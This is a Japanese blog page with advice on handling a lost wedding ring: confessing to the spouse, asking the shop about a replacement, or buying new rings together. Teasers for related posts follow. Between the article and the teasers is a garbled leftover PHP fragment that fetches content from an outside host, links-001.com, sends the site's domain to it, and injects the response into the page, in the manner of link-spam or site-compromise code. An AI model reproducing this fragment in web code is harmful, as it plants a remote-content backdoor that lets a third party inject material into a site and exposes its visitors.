結婚指輪を紛失してしまった時の対応

結婚指輪は特別で大切な指輪です。
ですから、日ごろから気を付けて着けておくことも必要なのですが、万が一紛失してしまった時は、速やかに相手に報告することをオススメします。
隠そうと思っても、それはまず無理だと思って良いでしょう。
いつまでもびくびくしながら生活しても楽しくありませんので、勇気をもって告白してください。
もし結婚してまだ間もないのであれば、結婚指輪を買ったお店にまだ同じものが売っているかもしれません。
是非一度、お店に問い合わせてみることをオススメします。
もしかしたら、紛失した分だけ買うこともできるかもしれません。
もしそれが難しいような時は、思い切って二人で新しい指輪を購入してみてはいかがでしょうか。
「雨降って地固まる」ではありませんが、これをチャンスにより二人の絆が深まる可能性だってあります。
結婚指輪は、いつも着けているが故に、無くしやすいとも言えます。
保管場所を決めておくことも必要。
特に洗剤と使って行う家事などは、結婚指輪は抜けやすいので十分注意して行うようにしたいものです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新投稿

  • 結婚指輪は捨てるよりも買取がオススメ

    何らかの理由で結婚指輪が不要になったら、捨ててしまうよりも買取を検討した方がお得です。
    なぜな …

    続きを読む...

  • 結婚指輪にかける費用はどれくらいか

    ブライダルリングとして結婚指輪と婚約指輪がありますが、二つを比較した場合、結婚指輪の方が費用はかなり …

    続きを読む...

  • 薬指にはめる結婚指輪の意味について

    結婚指輪は左手の薬指にはめる。
    これは、多くの方がご存知のことだと思います。
    海外には、 …

    続きを読む...